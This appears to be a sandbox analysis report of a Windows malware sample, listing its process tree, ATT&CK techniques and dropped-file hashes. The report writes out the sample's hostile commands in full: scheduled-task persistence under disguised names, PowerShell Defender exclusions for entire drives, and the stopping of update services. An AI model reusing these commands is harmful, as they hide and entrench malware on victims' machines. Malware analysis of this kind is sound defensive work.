C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1708
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2468
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:616
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1816
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:844
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 11 /tr "'C:\fontwin\MsServerHost.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2308
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2840
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 7 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2168
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:680
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Indicator Removal: Clear Windows Event Logs
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:824
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1168
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\system32\taskeng.exetaskeng.exe {FB6E12B7-C8B6-4EBE-BB22-28CE7B128E13} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
PID:1972 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:972
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:548
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1076
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2752
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2064
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe"C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fontwin\n5YK.vbe"4⤵
- System Location Discovery: System Language Discovery
PID:2820 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\fontwin\eUNvwPScHJBqRVxJMAbWN67h5pJ3FqxG.bat" "5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1532 -
C:\fontwin\MsServerHost.exe"C:\fontwin/MsServerHost.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:1524 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0xa5amt\l0xa5amt.cmdline"7⤵
- Drops file in System32 directory
PID:2208 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B88.tmp" "c:\Windows\System32\CSCC9902AE3669E46CBA835304E20B91DA7.TMP"8⤵PID:2420
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\taskeng.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre7\lib\audiodg.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\I8fc6IW9GS.bat"7⤵PID:1868
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:1192
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2540
-
-
C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe"C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe"8⤵
- Executes dropped EXE
PID:576
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\twain32.exe"C:\Users\Admin\AppData\Local\Temp\twain32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2656
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2892
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2464
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1492
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2264
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2148
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:316
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1512
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2292
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1536
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:3044 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:704
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2596 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2488
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1368
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15608639672108224950-14715180936211419018321065262048830045-776638947390487830"1⤵PID:1872
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1238398341-659628192-4295670211553003159-576583664-326450821-619744493-1938678142"1⤵PID:1808
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1518977345188156466721413073813216416010243286951207682115-12013319781240109577"1⤵PID:2544
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-774281283-3345379611530120956782601013473500736411323442820940991-1817523791"1⤵PID:2688
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1896547813660978119663986725122283747-566455852-20601186351510509308-1099925271"1⤵PID:2168
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-476339219-18387216091733780528446269900-1203867472-163299656-1278129283400718268"1⤵PID:616
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1425895931-1459155297-1030909657-1404036651-6094235201753784735-659463250-1592003405"1⤵PID:896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1010810203154649841225170848-4781763591885857547921223131-1520466415-487749862"1⤵PID:784
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12969235451934801014735408548-484793368-181359751215871930439078045511236588900"1⤵PID:1484
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13418808911396824779-2055146909663491764-682809211-1297891469-1300561119-752043961"1⤵PID:1796
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "55462212-1228523728-1345552000-996354904-647328365432123280415958590-310174339"1⤵PID:1820
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "291818685358308684-1877777731-737469367-330309447-1043155418235888206-1755703497"1⤵PID:1132
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1338350028-10758663919093015021071437995-1971980825-2114670581-2133448191-1993906817"1⤵PID:2972
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "570627643-1778886505-536157938-269439133910461715-1686100011253201051729689102"1⤵PID:1700
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-320485692028606837131862478819749850435453942545350314472065600854-550363581"1⤵PID:3040
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1403411900899306039-1817528917-768939021729662419-71388544311708852511941323709"1⤵PID:2452
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-140159719963453926915080597548743166-12187560431318289978-942573003-1878308910"1⤵PID:340
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-116027647-2103278187-8367714161166176944527668679-4708047921646396828130079302"1⤵PID:2656
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "886718463-1965334119-836958039-173561535576426255038409670022694739975369401"1⤵PID:1696
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-89340691416722382732311215111334382684-95219281106922508315114122061481644360"1⤵PID:2056
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1826727562-763286189638657688-170591964135094834-842981042-580412234825935535"1⤵PID:936
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1005624702-260780271360611460143038272559407236487138880-442065318863135968"1⤵PID:2660
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1416782018-14199647961089503654-1605954281-17219706821924320427-1917587775-120571326"1⤵PID:2580
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-777673994883885454227234876-1579917893-1207943891003820853-567667348951797558"1⤵PID:2424
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "123536218726514910-112392129034712752354177729-9029685731266937003627726603"1⤵PID:2560
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2045584484-125649292710281925301860679994-1587036236-1901919754-1123768988-544782946"1⤵PID:2164
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9658744702061212601839304293529795986-1708592001849241490-1348798236-788107866"1⤵PID:2624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "832916923-637579412-9491897507095594032052311988951258501-37878278202637464"1⤵PID:1692
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17958568271608487644-1153548036948975869-2045741807-17481344291565325354969744079"1⤵
- Suspicious use of SetWindowsHookEx
PID:2456
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
233B
MD5a90628775a86c4eb0804f9f418c88275
SHA15b4e5a939d8ad3a02229bf7b143b3e336c16b323
SHA256975e12f37beb9144569ed7097a6e68242eee3923fd21c79432bae782b805f779
SHA5125f8c0698878281a181be62d5219461eb416c39dfa343072e73044e64a4887b03b63ee5ce2872b84284910e95245e258010c4abe268e29955783d36045d6be022
-
Filesize
1KB
MD54cd1713e48aa157c6be5e16650df8758
SHA1a9ec79e90cb24385ba6959e821c43090f8c46f4b
SHA2562c72ae7c388db5c6139a4d4b8c16f109e7fc4b2bfc36448bb867bf3118f8efc9
SHA51276847364a6922eaafc556d0b2953174397051d5083fdfb5d56741a8ce2f1d0bd0c0d659ab1f6a3d4074d76302b8e71106ff3cd89327916200ea744f6bb4bdc7f
-
Filesize
5.7MB
MD5de40bff13376524593bbf365ac4489f2
SHA119178234bd0e35a984ff183418fc2f39c48b4e8d
SHA256bafc17e2573f25344dbd7e27703f8e91b2abde15ac01a932bd3f12e686ab7952
SHA512957fcc33adead5af1e5919251976c863b519f3097f21d1abf909cea136fe0b8ad7e8c15696a409d212d471c3b4d899cd021e7194fbcc4c6445b220383653016b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cb60fa7f0214516a73bc38fb0c7ea2b1
SHA13872dd09e5ba117472439bae410baf657e80d1ae
SHA25692366b1412485b86bc97fb3c8c64160017425a014c295f5f02e42275c9dcf9e2
SHA512ee403d75a7575436ddfb02e24aa9ddb29406ce985bfad43343b4bb822e5c75a004e6af444958224120d5dd851bc77eed370b0b22510465f93a33aedf67b69b3c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5360ef56770075be0f2cce0809304ef7f
SHA17898edf0adb160aac8575581c4e95d04f34f1d29
SHA25602cff7a718435e374132c614981a3c6d202b32470362afc21f5842413d8d236d
SHA512d1543c1435bc55265300bd6464eaa3e6d82ae5899e2364b6f78b0e16b37c63ec601acac693fca69cb2403ae19da7736682df6888d7d179b9d334559439fa5e85
-
Filesize
3KB
MD519fab023fa8aa0d04cb57060ff0870ac
SHA1dcfc8b9b04bca7fde220708868dc95aa86cf8941
SHA2564254847fcc95d3c64e6b84fb22f5985b59ce0f82c118860d1f71376536cc93cd
SHA512992a93ed227eba64b62ca47fac13701defd23137aa4be1ebc48c120820f4d020628439c4561283e2789effa0fc647e7b6bb78ffa0f3f5d6ab84ac692fe3f5796
-
Filesize
3KB
MD55bb494a296a3d733d7a3a5ce31ddf55b
SHA194d8e02a6ead63413e5855673aadfb9b8e64ac10
SHA256575104ae7afa812682010af50789f1cb8f4d0d631ed00c9df1cff4b57d7666c8
SHA51207a820aeb9f9bcee6b0c90b51b4bf698c479f2d829c23fccac84f71d2793a3372fe3dd9a068aefc2bc3e346e9890960d5b07a2426ed32179c5715f4974013648
-
Filesize
3KB
MD546a50e88fc733e12668aa993f7031106
SHA194725b4b6c2f472f5b799b56f7b1307e726101f2
SHA256f08483cc8c3ebe78e44d8324775ad66d22325b0ff2e6440cf37bf974a7ccd786
SHA512534972902a655eef593396ecfaa9c0afabf247d8eac6af88185f57e13814a398a20dc0c47979bb0d24478bfcd07d2d0706e1818a474fd6ab12a26ffab4d730db
-
Filesize
1.9MB
MD5c23ec3a6c041cb8b7d626faee44ef7d8
SHA195739b177a47a9b0347591994f461d44db403649
SHA256f791649ac2127072a37c5c1697ab9b304c15ad0aad93a6daecccaf5e442a051e
SHA51289e420c422278a393102a27b51dfc56ef289aeb0d627db93bd4247ea796b7f83cfbfd327ddc6efaa913450970ab075c9dd3128159949713e10fce2cd178b8087
-
Filesize
74B
MD53949760e5406001b774a6b5349902977
SHA1187aacbf7de65a5716065184c9a0290cd533ff82
SHA256a3f206b3f2588d0bd3aa95e46209fac7895b5dd955b3bbd8eec63f3f0a37c1d2
SHA512694fc9fe0dd428b6d7e8f6805df29e09b85cee309a8c5e7560c4b9b3fd36d6547083c33d0073bbaad896b2b43ee13f7df0ec29309b196027ecb57710b9bf8cff
-
Filesize
218B
MD57e7c767f1e75be51878d3e99bd17eb60
SHA1e2f48d427ab85782feac5119447d0199a7d302fd
SHA256842bcb05a80577f1a81bc2c58f25311ce81487e78855438bd9bd565f79318c5d
SHA5122ab9cb47423608f5fea2189fde78500345e689f06bb65f4dace8108372091bc0cfe76b8ae52cbae86185fcc13a826fab07e09e8ac4126d0d800627f8cd9d0694
-
Filesize
354B
MD5ce266cf1203fb411db79af341d1fe4dc
SHA1ded62f51289f3f4dd74942d1379323e0f14c03b8
SHA256be89c03236d0f39c769096b3ae257f7505acb32e7c823773e0a76056e1396aea
SHA5126a9c5aed3b6247839aa916593e2ca58a51e4fe00c923ddfcd7762e12fe1807cce11d45fc662e0e1b4a2b26ee16aad7398fc510735cb3bab84bde5a0d4afa59d4
-
Filesize
235B
MD5ffa06e0e706432b8298216cfe7aae586
SHA17f9b86254309e222e5a2078cb3b2139e04aecfd6
SHA25665bb8e0fbda410281edf7f7e90ab865da15b11f15f1cc4695707ed5944560310
SHA5123ffe2f1bbd9994fd7c9ddf23a01e7d0c2948f50e476cb9b97020b2dac312f869c73ad04c51a3d9041a1a5e9379c5931f1f8294e0edc1bcb55018313b0fea568f
-
Filesize
1KB
MD5078586b266e519b5c113064d7a0bf45c
SHA1a9395c0ef35add5c75591ebb94c85c1f33f408bf
SHA256ccf292ff9f142b204ad4f4481a044ba8f9ab274305dcb604bf0b8ae91819ab1e
SHA5125b8eb6aad62657309088c4668d633c2aa6324d4824ec32c3c5e133df0a5493a4342c980e077ba565f3aab29c58f95c8db7195415a1e554384405c1457730f959
-
Filesize
1.8MB
MD58d9a9cff85c871e53cdfa82d0a46fc94
SHA1f16d21268be5b0125f11157ff2d82612046010c5
